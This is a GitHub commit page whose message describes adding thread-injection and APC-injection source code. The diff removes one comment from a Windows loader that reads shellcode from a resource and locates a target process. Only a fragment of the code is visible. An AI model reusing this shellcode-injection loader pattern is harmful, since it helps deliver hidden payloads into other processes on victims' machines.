Skip to content

Commit

Permalink
增加线程注入和APC注入的源代码
Browse files Browse the repository at this point in the history
  • Loading branch information
Wangfly authored and Wangfly committed Aug 23, 2023
1 parent 4d51245 commit 8c6a174
Showing 1 changed file with 0 additions and 1 deletion.
1 change: 0 additions & 1 deletion plug/APC-Ijnect Load/APC.cpp
Original file line number Diff line number Diff line change
Expand Up @@ -70,7 +70,6 @@ DWORD FindProcessId()

int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR lpCmdLine, _In_ int nCmdShow)
{
//1.Get shellcode and shellcodesize from Resource by ID
UINT shellcodeSize = 0;
unsigned char *shellcode = GetShellcodeFromRes(100, shellcodeSize);
if (shellcode == nullptr)
Expand Down

0 comments on commit 8c6a174

Please sign in to comment.